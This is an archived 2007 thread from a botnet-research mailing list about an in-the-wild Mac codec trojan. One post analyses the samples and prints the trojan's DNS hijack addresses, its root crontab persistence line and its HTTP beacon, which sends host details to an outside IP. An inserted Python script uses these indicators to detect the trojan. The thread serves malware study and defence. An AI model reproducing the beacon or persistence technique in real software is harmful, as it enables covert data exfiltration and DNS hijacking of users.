Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Åsk Wäppling
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
I've been out looking for this trojan to see if I can find it, but have had
no luck so far. Has anyone here seen it? I'd like a copy to dissect.

cheers
åsk
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets


Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread PinkFreud
I've analyzed two variants of this trojan, procoded1000.dmg and
ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).

These trojans basically consist of three scripts and a browser plugin
(used by Safari / Firefox?  I'm not sure.).

On the disk image:
- install.pkg/Contents/Resources/post{install,upgrade} are the same
script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is
the same as above preinstall scripts


Only difference between two packages appears to be the dns servers:
procodec1000:
s1=85.255.116.61
s2=85.255.112.103

ultracodec1000:
s1=85.255.115.34
s2=85.255.112.158

- Preinstall scripts (and plugins.settings from Archive.pax.gz, which
is the same) set the compromised machine's DNS to the above servers
(depending on which trojan is installed).  In addition, it tries to set
a crontab for root that executes itself (as
/Library/Internet Plug-Ins/plugins.settings) once a minute.

- Postinstall scripts execute sendreq (found in Archive.pax.gz), and
then removes sendreq.  sendreq sends 'mac;cpu type;hostname' as a
base64-encoded argument to the 'Accept-Language' header to
85.255.121.37.

Example:
GET / HTTP/1.1
Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
Host: 85.255.121.37


- Installs
/Library/Internet Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
I'm not certain what this does.  There's not much by way of suspicious
strings in this executable, and I don't have a way to safely execute it
to watch what it does.


Interesting strings (for antivirus or overly suspicious sysadmins :) ):
install.pkg/Contents/Resources/English.lproj/Description.plist:
<string>Its a suppa puppa desc yo</string>

In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
Verified RoveSupa Plugin

Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
Verified RoveSupa Plugin




On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:
> Sure, I saved a couple copies.  I'll send you a link in a second email.  If
> anyone else is interested in a copy, please let me know.

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
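
The check-in and persistence details in the analysis above are enough to write a small triage script. What follows is an added example, not code from the original post and not the trojan's own code: it decodes the Accept-Language value from the request quoted above into the 'mac;cpu type;hostname' fields, checks resolver entries against the four DNS server addresses listed for the two variants, and flags crontab lines that launch anything from /Library/Internet Plug-Ins/. The HTTP request is the one shown in the analysis; the resolv.conf and crontab contents are constructed for the example, and the rule that no legitimate cron job runs out of a browser plug-in directory is an assumption of the example, not something the analysis states.

```python
import base64
import binascii

# Resolver addresses reported above for the two variants.
ROGUE_DNS = {
    "85.255.116.61": "procodec1000",
    "85.255.112.103": "procodec1000",
    "85.255.115.34": "ultracodec1000",
    "85.255.112.158": "ultracodec1000",
}
# Host that sendreq reports to.
BEACON_HOST = "85.255.121.37"
# Directory the preinstall script's cron job runs from.
PLUGIN_DIR = "/Library/Internet Plug-Ins/"

# The request quoted in the analysis above (CRLF line endings added).
SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==\r\n"
    "Host: 85.255.121.37\r\n"
    "\r\n"
)

# Constructed resolv.conf and root crontab contents (not from a real host).
SAMPLE_RESOLV_CONF = """\
# constructed sample
nameserver 192.168.1.1
nameserver 85.255.116.61
nameserver 85.255.112.103
"""
SAMPLE_CRONTAB = """\
# constructed sample
0 3 * * * /usr/sbin/periodic daily
* * * * * "/Library/Internet Plug-Ins/plugins.settings"
"""


def decode_beacon(header_value):
    """Decode an Accept-Language value as the 'mac;cpu type;hostname' beacon.

    Returns a (platform, cpu, hostname) tuple, or None when the value is not
    base64 (a normal language tag never is) or lacks the three-field shape.
    """
    try:
        raw = base64.b64decode(header_value.strip(), validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    fields = text.split(";")
    if len(fields) != 3 or fields[0] != "mac":
        return None
    return tuple(fields)


def parse_headers(raw_request):
    """Return the header block of an HTTP/1.x request as a lowercase-keyed dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw_request):
    """Flag a request that looks like the sendreq check-in."""
    headers = parse_headers(raw_request)
    beacon = decode_beacon(headers.get("accept-language", ""))
    return {
        "host": headers.get("host"),
        "known_beacon_host": headers.get("host") == BEACON_HOST,
        "beacon": beacon,
    }


def rogue_resolvers(resolv_conf):
    """Return (address, variant) for each nameserver line that matches a listed rogue DNS."""
    hits = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver" and parts[1] in ROGUE_DNS:
            hits.append((parts[1], ROGUE_DNS[parts[1]]))
    return hits


def suspicious_cron_entries(crontab):
    """Return crontab lines that run something out of the plug-in directory.

    Assumption (not from the analysis): no legitimate cron job executes from
    /Library/Internet Plug-Ins/, so any such entry deserves a look.
    """
    return [
        line.strip()
        for line in crontab.splitlines()
        if line.strip() and not line.lstrip().startswith("#") and PLUGIN_DIR in line
    ]


if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
    print(rogue_resolvers(SAMPLE_RESOLV_CONF))
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
```

Run against a proxy log, the beacon decoder is the useful part: a base64 Accept-Language value that decodes to three semicolon-separated fields is not something a browser sends, so it can be matched without knowing the C2 address in advance, which matters once the 85.255.x.x hosts move.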




Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread PinkFreud
Gadi already made the point that the significance of this lies in
professional malware authors taking notice of Apple.  If this trojan
was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction
would be the same - 'wow, the malware authors are taking notice of a
new platform!'.  That *is* significant, and those who are chalking that
reaction up to 'anti-Apple zealotry' are sorely mistaken.

There is a second point being made here, too - Apple isn't exactly
known for writing bug-free code (I've already given some examples
earlier in this thread), and they're not exactly known for fixing bugs
until they're absolutely forced to.  This is liable to create problems
down the road - given that the malware authors are now starting to take
notice of Macs, they'll undoubtedly try a few exploits before long.  I
just hope Apple has patched all known holes by then... :)


On Sun, Nov 04, 2007 at 12:51:29PM -0800, Kyle Lutze babbled thus:
> What makes me unhappy is that people are using an SE exploit as a
> way to say here's proof that a mac is as insecure as a windows box
> or gadi saying the itw barrier has been broken for apple (read above
> about requirements for itw status).

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.




Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Kyle Lutze
PinkFreud wrote:
> Gadi already made the point that the significance of this lies in
> professional malware authors taking notice of Apple.  If this trojan
> was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction
> would be the same - 'wow, the malware authors are taking notice of a
> new platform!'.  That *is* significant, and those who are chalking that
> reaction up to 'anti-Apple zealotry' are sorely mistaken.
>
fair enough, both your points there are quite valid and I wasn't 
denying the significance of malware authors taking notice of Apple, 
just that this being considered in the wild is a bit overboard.

> There is a second point being made here, too - Apple isn't exactly
> known for writing bug-free code (I've already given some examples
> earlier in this thread), and they're not exactly known for fixing bugs
> until they're absolutely forced to.  This is liable to create problems
> down the road - given that the malware authors are now starting to take
> notice of Macs, they'll undoubtedly try a few exploits before long.  I
> just hope Apple has patched all known holes by then... :)
>

My point is, where's the bug in apple's code here? There's nothing 
apple can do about human stupidity in ignoring all of the message 
boxes before this trojan can be installed.



Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread James Pleger
You are beating a dead horse here.

The point of this whole thing was to say that HEY, they are targeting a new
platform other than windows. Not that it requires user interaction to
install it. Honestly, think about it... this is how a bunch of the early
malware was installed on the windows platform. By USER interaction...
wanting to go to a porn site and needing xyz dialer to look at the pretty
pictures.

The other point is that mac users have a false sense of security...
Honestly, how many mac users run AV? I know I don't on my iBook...

The point about Windows being less secure than OS X is true (I agree with it),
but in another sense it doesn't matter. If someone isn't patching they are
both insecure. I am not a Windows fanboy by any means, but the argument of
OS X is more secure than Windows in my mind isn't a good point. I honestly
don't care what is more secure out of the box... It is my job to keep things
secure no matter what OS or version is on them. If there is a remote exploit
that can get me root on an unpatched OS X (like there have been many security
updates that fix), and I can get the same type of privs on an unpatched
Windows box then they are both insecure. Default setups honestly on
Windows have gotten much better than in prior years. However we aren't here
to talk about Windows versus Linux versus Mac.




On Nov 4, 2007 2:15 PM, Kyle Lutze [EMAIL PROTECTED] wrote:

> PinkFreud wrote:
> > Gadi already made the point that the significance of this lies in
> > professional malware authors taking notice of Apple.  If this trojan
> > was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction
> > would be the same - 'wow, the malware authors are taking notice of a
> > new platform!'.  That *is* significant, and those who are chalking that
> > reaction up to 'anti-Apple zealotry' are sorely mistaken.
> >
> fair enough, both your points there are quite valid and I wasn't
> denying the significance of malware authors taking notice of Apple,
> just that this being considered in the wild is a bit overboard.
>
> > There is a second point being made here, too - Apple isn't exactly
> > known for writing bug-free code (I've already given some examples
> > earlier in this thread), and they're not exactly known for fixing bugs
> > until they're absolutely forced to.  This is liable to create problems
> > down the road - given that the malware authors are now starting to take
> > notice of Macs, they'll undoubtedly try a few exploits before long.  I
> > just hope Apple has patched all known holes by then... :)
> >
>
> My point is, where's the bug in apple's code here? There's nothing
> apple can do about human stupidity in ignoring all of the message
> boxes before this trojan can be installed.
>




-- 
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]


Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Kyle Lutze
James Pleger wrote:
> You are beating a dead horse here.

yeah, I just noticed while going through more e-mails that there is 
another thread where this topic was being beaten. Not much more need 
for discussion on this trojan then I guess.



Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Jim O'Gorman
On 11/4/07, Kyle Lutze [EMAIL PROTECTED] wrote:



> What makes me unhappy is that people are using an SE exploit as a
> way to say here's proof that a mac is as insecure as a windows box
> or gadi saying the itw barrier has been broken for apple (read above
> about requirements for itw status). No computer is 100% secure, but
> with a default setup of windows vs. mac a mac is still more secure.
> if they were to write this trojan for a windows box they wouldn't
> have to worry about requiring superuser authentication on the
> majority of systems as by default your account is an administrator
> account on windows and not many end users change that, or they could
> just take advantage of any of the multitude of vulnerabilities
> available on windows boxes directly connected to the internet to
> install it automatically without even having to attach it as a fake
> video codec to a porn video.


From my personal POV here, I think it best to break this down to the
simplest terms.
If we want to assume that Risk = Threat x Vulnerability, then the issue here
is not Vulnerability. I think everyone here agrees that the Vulnerability
being exploited in this situation is the user. However, Threat has just
increased. And with this increase in threat, the risk that automated
vulnerabilities will be exploited in the future has now increased.

My point is nothing more than being ignored does not make you more secure.
Bully for Apple that they are no longer ignored.

-- 
Jim O'Gorman
[EMAIL PROTECTED]
http://www.elwood.net


Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Tom
At 9:35 AM -0500 11/3/07, Dave Ellingsberg wrote:
> This is not so much a SE issue as it is a pure of heart issue.  For 
> way too long the Mac has been invincible, I can click on anything, 
> you can not hurt me!  This adds to the newbie issue as those buying 
> into the gullible mac attitude are invincible!  So it adds to the 
> End-Loser problem.  Now we see a shift in targeting and lo the 
> invincible are to be subjected to the Kryptonite of the Internet 
> underworld.  And without the antibodies of common sense that those 
> of us who have prowled the gutters of the mighty M$. 
>
> There is no way to wake up those who have come to slurp up the 
> invincible theme anymore than you can change that attitude of those 
> who think M$ is better because it is a GUI interface to servers and 
> therefore anyone can do it safe and secure [well I have not heard 
> those last two things come up when it's time to switch!]. 
>
> Most on this list have years of experience supporting groups of the 
> above, in all 4 categories. 
> We are called on to clean up the messes after the clickers and 
> planners.  We are all reactive in one way or another.  Keep thinking 
> about it, ProActive is really not attainable, but it's a good goal!
>
> bigfoot.


Dave,

I know there are some Mac users that think and act like that. 
However, I think some of the nanny nanny do do attitudes toward 
Windows is just like kids in the school yard.  I actually believe 
that more Windows users believe that Mac users feel and act that way 
than Mac users do.

I know many current Mac users and most are unlike your 
characterizations (and unlike my mother who does not have admin 
access).  Most are happy that the Mac (like its underpinnings of BSD 
Unix) comes out of the box with ports closed and root not even 
enabled. Most don't operate day to day as admin. In my experience, 
most are more careful and diligent than your average PC user on 
clicking on unknown links and operating their machines in general.

Both your data and mine are anecdotal but I'm willing to bet that 
some university person on this list can do a study and prove one of 
us wrong. ;-)

However, I still have not been provided with a compelling argument 
that out of the box Windows is in security even equal to Mac or 
Solaris or Linux. That might be part of the issue.

I hope we can get away from this Windows/Mac/Unix/Solaris/Linux who's 
perceived to be safer and get back to real issues like what's the 
vector and how we all can mitigate/manage it.

Tom



Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Steven Adair



On Sat, 3 Nov 2007 13:54:44 -0400, Mr. X [EMAIL PROTECTED] wrote:
> Dude, you gotta get over yourself. The fact that the mac os x
> operating system has no viruses is not the fault of the user base.
> And the tirades of the told-you-so's are petty and so OT let's just
> get back to info on botnets. Anyone targeting the Mac or Linux base is

I agree they are OT but technically isn't this entire thread, regardless of the 
view point?  AFAIK there is not presently any botnet associated with this mac 
trojan or any variants of it as this time.  There's definitely potential but no 
connection, otherwise we could be discussing any piece of malware on this list.

> clearly doing it not to add bots (doesn't even make sense numbers wise)
> but for exactly this response, seeing their handiwork talked about ad
> nauseam on CNN and with the shoe banging security websites and
> slashdot windows users smugly yelling I was right!
>
> Sorry, but enough is enough gang.
>
> D
>
> On Nov 3, 2007, at 10:35 AM, Dave Ellingsberg [EMAIL PROTECTED] wrote:
>
> > This is not so much a SE issue as it is a pure of heart issue.  For
> > way too long the Mac has been invincible, I can click on anything,
> > you can not hurt me!  This adds to the newbie issue as those buying
> > into the gullible mac attitude are invincible!  So it adds to the
> > End-Loser problem.  Now we see a shift in targeting and lo the
> > invincible are to be subjected to the Kryptonite of the Internet
> > underworld.  And without the antibodies of common sense that those
> > of us who have prowled the gutters of the mighty M$.
> >
> > There is no way to wake up those who have come to slurp up the
> > invincible theme anymore than you can change that attitude of those
> > who think M$ is better because it is a GUI interface to servers and
> > therefore anyone can do it safe and secure [well I have not heard
> > those last two things come up when it's time to switch!].
> >
> > Most on this list have years of experience supporting groups of the
> > above, in all 4 categories.
> > We are called on to clean up the messes after the clickers and
> > planners.  We are all reactive in one way or another.  Keep thinking
> > about it, ProActive is really not attainable, but it's a good goal!
> >
> > bigfoot.





Re: [botnets] mac trojan in-the-wild

2007-11-04 Thread Gadi Evron
On Sun, 4 Nov 2007, Steven Adair wrote:
> On Sat, 3 Nov 2007 13:54:44 -0400, Mr. X [EMAIL PROTECTED] wrote:
> > Dude, you gotta get over yourself. The fact that the mac os x
> > operating system has no viruses is not the fault of the user base.
> > And the tirades of the told-you-so's are petty and so OT let's just
> > get back to info on botnets. Anyone targeting the Mac or Linux base is
>
> I agree they are OT but technically isn't this entire thread, regardless of 
> the view point?  AFAIK there is not presently any botnet associated with this 
> mac trojan or any variants of it as this time.  There's definitely potential 
> but no connection, otherwise we could be discussing any piece of malware on 
> this list.

It's a trojan horse. It hijacks DNS and pwns people. Obviously there is a 
second stage of infection.

What do you think it is we do here?


Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Tom
(Sorry on Digest)

Hey all give it a break. You want to discuss this/ make a big deal 
about it then  categorize it as a social engineering issue that 
occurs against not only any software platform but in most real life 
scams as well.

I know many like to hype any issue against the OSX platform. To a 
certain degree this may indicate the increased targeting of OSX but 
it is interesting that the increased activity argument never seems 
to rise when the odd linux or unix social engineering exploit 
surfaces. Perhaps because none of us really know why an exploit was 
released or maybe because not a statistic does an isolated one off 
make?

A single instance every now and again does not necessarily indicate a 
shift in targeting.  Nor does a social engineering exploit attempt 
make a hype-able attack against OSX.

Seems like much ado... Now if everyone would change focus and help 
come up with aids to minimize the effectiveness of social engineering 
attacks (esp against neophyte and residential users) that would be 
something to write about.

Just my 2 cents,

Tom


Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Gadi Evron
On Sat, 3 Nov 2007, Tom wrote:
> (Sorry on Digest)
>
> Hey all give it a break. You want to discuss this/ make a big deal
> about it then  categorize it as a social engineering issue that
> occurs against not only any software platform but in most real life
> scams as well.
>
> I know many like to hype any issue against the OSX platform. To a
> certain degree this may indicate the increased targeting of OSX but
> it is interesting that the increased activity argument never seems
> to rise when the odd linux or unix social engineering exploit
> surfaces. Perhaps because none of us really know why an exploit was
> released or maybe because not a statistic does an isolated one off
> make?
>
> A single instance every now and again does not necessarily indicate a
> shift in targeting.  Nor does a social engineering exploit attempt
> make a hype-able attack against OSX.

Talk to you in 2 years.



> Seems like much ado... Now if everyone would change focus and help
> come up with aids to minimize the effectiveness of social engineering
> attacks (esp against neophyte and residential users) that would be
> something to write about.
>
> Just my 2 cents,
>
> Tom


Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Tom
At 8:50 AM -0500 11/3/07, Gadi Evron wrote:
> On Sat, 3 Nov 2007, Tom wrote:
> > (Sorry on Digest)
> >
> > Hey all give it a break. You want to discuss this/ make a big deal
> > about it then  categorize it as a social engineering issue that
> > occurs against not only any software platform but in most real life
> > scams as well.
> >
> > I know many like to hype any issue against the OSX platform. To a
> > certain degree this may indicate the increased targeting of OSX but
> > it is interesting that the increased activity argument never seems
> > to rise when the odd linux or unix social engineering exploit
> > surfaces. Perhaps because none of us really know why an exploit was
> > released or maybe because not a statistic does an isolated one off
> > make?
> >
> > A single instance every now and again does not necessarily indicate a
> > shift in targeting.  Nor does a social engineering exploit attempt
> > make a hype-able attack against OSX.
>
> Talk to you in 2 years.

Gadi,

You missed my point.  I don't doubt that there will be increases in 
targeting OSX or any other OS. In fact, I am surprised that there 
aren't a slew of cross-os kits out by now as many of the current 
server attacks are OS agnostic.

What I wanted to focus on was that social engineering is not 
just an OSX problem. It's a cross environment problem (including both 
cyber and real worlds) and more focus should be given to that and its 
mitigations.

Tom


Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Dave Ellingsberg
This is not so much a SE issue as it is a pure of heart issue.  For way too 
long the Mac has been invincible, I can click on anything, you can not hurt me! 
 This adds to the newbie issue as those buying into the gullible mac attitude 
are invincible!  So it adds to the End-Loser problem.  Now we see a shift in 
targeting and lo the invincible are to be subjected to the Kryptonite of the 
Internet underworld.  And without the antibodies of common sense that those of 
us who have prowled the gutters of the mighty M$.  

There is no way to wake up those who have come to slurp up the invincible theme 
anymore than you can change that attitude of those who think M$ is better 
because it is a GUI interface to servers and therefore anyone can do it safe and 
secure [well I have not heard those last two things come up when it's time to 
switch!].  

Most on this list have years of experience supporting groups of the above, in 
all 4 categories.  
We are called on to clean up the messes after the clickers and planners.  We 
are all reactive in one way or another.  Keep thinking about it, ProActive is 
really not attainable, but it's a good goal!

bigfoot.
 




Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Mr. X
Dude, you gotta get over yourself. The fact that the mac os x  
operating system has no viruses is not the fault of the user base.  
And the tirades of the told-you-so's are petty and so OT let's just  
get back to info on botnets. Anyone targeting the Mac or Linux base is  
clearly doing it not to add bots (doesn't even make sense numbers wise)  
but for exactly this response, seeing their handiwork talked about ad 
nauseam on CNN and with the shoe banging security websites and  
slashdot windows users smugly yelling I was right!

Sorry, but enough is enough gang.

D

On Nov 3, 2007, at 10:35 AM, Dave Ellingsberg [EMAIL PROTECTED] wrote:

> This is not so much a SE issue as it is a pure of heart issue.  For  
> way too long the Mac has been invincible, I can click on anything,  
> you can not hurt me!  This adds to the newbie issue as those buying  
> into the gullible mac attitude are invincible!  So it adds to the  
> End-Loser problem.  Now we see a shift in targeting and lo the  
> invincible are to be subjected to the Kryptonite of the Internet  
> underworld.  And without the antibodies of common sense that those  
> of us who have prowled the gutters of the mighty M$.
>
> There is no way to wake up those who have come to slurp up the  
> invincible theme anymore than you can change that attitude of those  
> who think M$ is better because it is a GUI interface to servers and  
> therefore anyone can do it safe and secure [well I have not heard  
> those last two things come up when it's time to switch!].
>
> Most on this list have years of experience supporting groups of the  
> above, in all 4 categories.
> We are called on to clean up the messes after the clickers and  
> planners.  We are all reactive in one way or another.  Keep thinking  
> about it, ProActive is really not attainable, but it's a good goal!
>
> bigfoot.





Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Jim O'Gorman
On 11/3/07, Gadi Evron [EMAIL PROTECTED] wrote:


> You really think a criminal group with revenue goals targets the mac to
> make some mac users feel unhappy?


What is amusing about this whole situation is the Mac Defender attitude
that rises up whenever it comes out Apple is not perfect. This happened a
while back with the wireless issues and now is coming out again.

Gadi is 100% right, these people are not doing this for fun or bragging
rights. This is a potential market opportunity that has been ignored up to
this point. Macs up to this point have not been the target of malware
attacks, and as such you have this ever growing audience of fresh
faced innocent babes that have not experienced the harsh reality that users
on windows based systems have been living with.
A lot like some city boys driving out to some rural area where people don't
lock their doors for some easy pickings.
So why not throw out a couple trojans like this and see how many systems
they pick up? Then see what the total ROI was. Decide at that point if it is
worth doing more.

If nothing else, it starts to refine the attacks so when Macs are more
pervasive the attackers have a plan of attack. That day is coming if
you believe the reports about 40% of college users on Macs. (
http://www.dailyprincetonian.com/archives/2007/10/05/news/18871.shtml 40
percent of Princeton students and faculty use Macs as their personal
computers.) Honestly, I thought most Mac folk would see this as a good
thing, it shows the Mac has become enough of a player on the market to be
worth attacking.
On the other hand, if you ran out to the Mac suburb to get away from all
the bad crap happening in the Windows neighborhood, it might be time to
move further out... Ubuntu just came out with a new release, Cory Doctorow
has moved from the mac to ubuntu (
http://www.boingboing.net/2006/06/29/mark-pilgrims-list-o.html) so it must
be the next hip thing to do. White flight everyone, all the cool kids are
doing it.


-- 
Jim


Re: [botnets] mac trojan in-the-wild

2007-11-03 Thread Randy Mueller
Hey,
Mac's just work! Right? It's going to get ugly.


Re: [botnets] mac trojan in-the-wild

2007-11-01 Thread Jeremy Chatfield
Hi Gadi,

I think you've gone a bit over the top here. I use Macs in preference to
Windows because it reduces my system administration demands to tiny levels.
I can focus on my business, not a blizzard of meaningless messages, a welter
of updates requiring reboots, and bizarre, partially documented application
crashes, reboots, infections, reinstallations, Windows Genuine Annoyance,
etc.

InfoSec is there to make sure that I can run my business, not as an end in
itself. It *prevents* profit-making activity by having effort expended on
internal needs. So if the Mac hasn't *needed* a higher level of security
hoops previously, that's good. So long as weaknesses are fixed *when
needed*, I'm a happy bunny. If there's a Day Zero attack that hits a Mac,
I'll be disappointed, but it's not a uniquely Mac situation to be in... If
the failure was an obvious weakness, I'm actually still pretty sanguine,
because it hasn't yet been exploited, despite being well known.

However, *this* codec installation tease is a social engineering attack. It
isn't exploiting a Mac vulnerability. It doesn't do privilege escalation,
but relies on an authorised user to do something foolish. That can happen on
any OS. The main defence against this kind of attack on a secure OS is that
the user is aware of the problems involved in changing security levels.

Practically, what defence *could* have been offered on Macs to defend
against *this* attack? An active AV system with a signature file? I think
that's about it. Certainly not any scary story of DNS or other as yet
unexploited vulnerabilities.

This isn't a virally propagated, privilege escalating infection. I remain an
unflustered Mac user, but I will be reminding my colleagues that they
shouldn't install software that they don't trust. In a couple of cases, I
may revoke system admin privileges, where I think that certain users don't
have enough technical knowledge to assess the threat. So... important, but
not yet scary and not yet enough to make me concerned that I should be
switching to another OS, or seriously concerned by Mac vulnerabilities.

And this has, so far, little to do with botnets... Unless this SE attack is
installing a bot. Is it? What does the bot do? Is there a signature? That'd
be interesting :)

Cheers, JeremyC.
-- 
Jeremy Chatfield


Re: [botnets] mac trojan in-the-wild

2007-11-01 Thread Gadi Evron
On Thu, 1 Nov 2007, Jeremy Chatfield wrote:

snip correct stuff

 And this has, so far, little to do with botnets... Unless this SE attack 
 is installing a bot. Is it? What does the bot do? Is there a signature? 
 That'd be interesting :)

Social engineering or vulnerabilities, the web is much of how bots 
propagate these days. A trojan horse == bot. That's how we used to call 
them.


Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Gadi Evron
On Wed, 31 Oct 2007, Joel Esler wrote:
 Um.  Not only do you have to purposefully go download it, agree to accept the 
 download, then agree to give the software admin privileges.  That's 3 accept 
 dialogues and a password type-in.  Hardly malware.

Not different from many Windows cases. Only Apple has a long history of 
unpatched vulnerabilities to cope with.

The Windows 98 eco-system is about to be re-created now that the itw 
barrier has been broken for Apple.

Gadi.


Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Joel Esler
This is the dns thing right?

--
Joel Esler
Sent from the road.

On Oct 31, 2007, at 10:06 PM, Gadi Evron [EMAIL PROTECTED] wrote:

 On Wed, 31 Oct 2007, Joel Esler wrote:
 Btw, not only is this the third piece of malware in the past year  
 or so, but it's just like those as well.  You have to click at least  
 2 accept dialogues, be coaxed to download it.  But then you have to  
 type in your admin password.

 How is this automated malware again?

 Or am I not thinking about the right piece of code?

 I think we are talking of different things, Joel.


 --
 Joel Esler
 Sent from the road.

 On Oct 31, 2007, at 7:25 PM, Gadi Evron [EMAIL PROTECTED] wrote:

 For whoever didn't hear, there is a Macintosh trojan in-the-wild  
 being dropped,
 infecting mac users.
 Yes, it is being done by a regular online gang--itw--it is not yet  
 another
 proof of concept. The same gang infects Windows machines as well,  
 just that now
 they also target macs.
 http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
 http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html
 This means one thing: Apple's day has finally come and Apple users  
 are going to
 get hit hard. All those unpatched vulnerabilities from years past  
 are going to
 bite them in the behind.
 I can sum it up in one sentence: OS X is the new Windows 98.  
 Investing in
 security ONLY as a last resort loses money, but everyone has to  
 learn it for
 themselves.
 Gadi Evron.



Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Eduardo Tongson
This is an SE type of malware. Codecs require installation so it needs
root/admin privileges.

On 11/1/07, Joel Esler [EMAIL PROTECTED] wrote:
 Btw, not only is this the third piece of malware in the past year or
 so, but it's just like those as well.  You have to click at least 2
 accept dialogues, be coaxed to download it.  But then you have to type
 in your admin password.

 How is this automated malware again?

 Or am I not thinking about the right piece of code?

 --
 Joel Esler
 Sent from the road.

 On Oct 31, 2007, at 7:25 PM, Gadi Evron [EMAIL PROTECTED] wrote:

  For whoever didn't hear, there is a Macintosh trojan in-the-wild
  being dropped,
  infecting mac users.
  Yes, it is being done by a regular online gang--itw--it is not yet
  another
  proof of concept. The same gang infects Windows machines as well,
  just that now
  they also target macs.
 
  http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
  http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html
 
  This means one thing: Apple's day has finally come and Apple users
  are going to
  get hit hard. All those unpatched vulnerabilities from years past
  are going to
  bite them in the behind.
 
  I can sum it up in one sentence: OS X is the new Windows 98.
  Investing in
  security ONLY as a last resort loses money, but everyone has to
  learn it for
  themselves.
 
  Gadi Evron.



Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Hanz Makmur
Yap. Social Engineering type of program is hard to deal with.

I don't see this as big as the subject would like it to be: mac
trojan in-the-wild.

'Wild' imho means out of control. An SE program requires many clicks. To
tame it even more, by default, on the Mac, unlike Windows, one needs
to enter the administrator password to activate this type of program.
Hidden network activities are also tamed even more in Leopard (v.10.5).

Hanz

On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote:

 This is an SE type of malware. Codecs require installation so it needs
 root/admin privileges.



Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread g.rees-jones
But what if a user configured OS X so that the administrator password
does not need to be entered each time?

Gadi Evron mailto:[EMAIL PROTECTED] wrote:
 On Wed, 31 Oct 2007, Hanz Makmur wrote:
 Yap. Social Engineering type of program is hard to deal with.
 
 I don't see this as big as the subject would like it to be: mac
 trojan
 in-the-wild.
 
 'Wild' imho means out of control. An SE program requires many clicks. To
 tame it even more, by default, on the Mac, unlike Windows, one needs
 to enter the administrator password to activate this type of program.
 Hidden network activities are also tamed even more in Leopard (v.10.5).
 
 in-the-wild in this context means what it means for years now in our
 realm:
 Currently actively exploited.
 
 
 
 
 Hanz
 
 On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote:
 
 This is an SE type of malware. Codecs require installation so it
 needs root/admin privileges.
 


Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Eduardo Tongson
Comparing apples and oranges. If you want an equivalent Tiger and XP
setup you have to run as a limited user in XP. If it is not obvious,
SE type malware also requires Administrator privileges in XP.

On 11/1/07, Hanz Makmur [EMAIL PROTECTED] wrote:
 Yap. Social Engineering type of program is hard to deal with.

 I don't see this as big as the subject would like it to be: mac
 trojan in-the-wild.

 'Wild' imho means out of control. An SE program requires many clicks. To
 tame it even more, by default, on the Mac, unlike Windows, one needs
 to enter the administrator password to activate this type of program.
 Hidden network activities are also tamed even more in Leopard (v.10.5).

 Hanz

 On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote:

  This is an SE type of malware. Codecs require installation so it needs
  root/admin privileges.




Re: [botnets] mac trojan in-the-wild

2007-10-31 Thread Eduardo Tongson
Then you have an OS X setup that is equivalent to a default XP setup
where the user is running as Computer Administrator.

Trojan slips through happily.

On 11/1/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 But what if a user configured OS X so that the administrator password
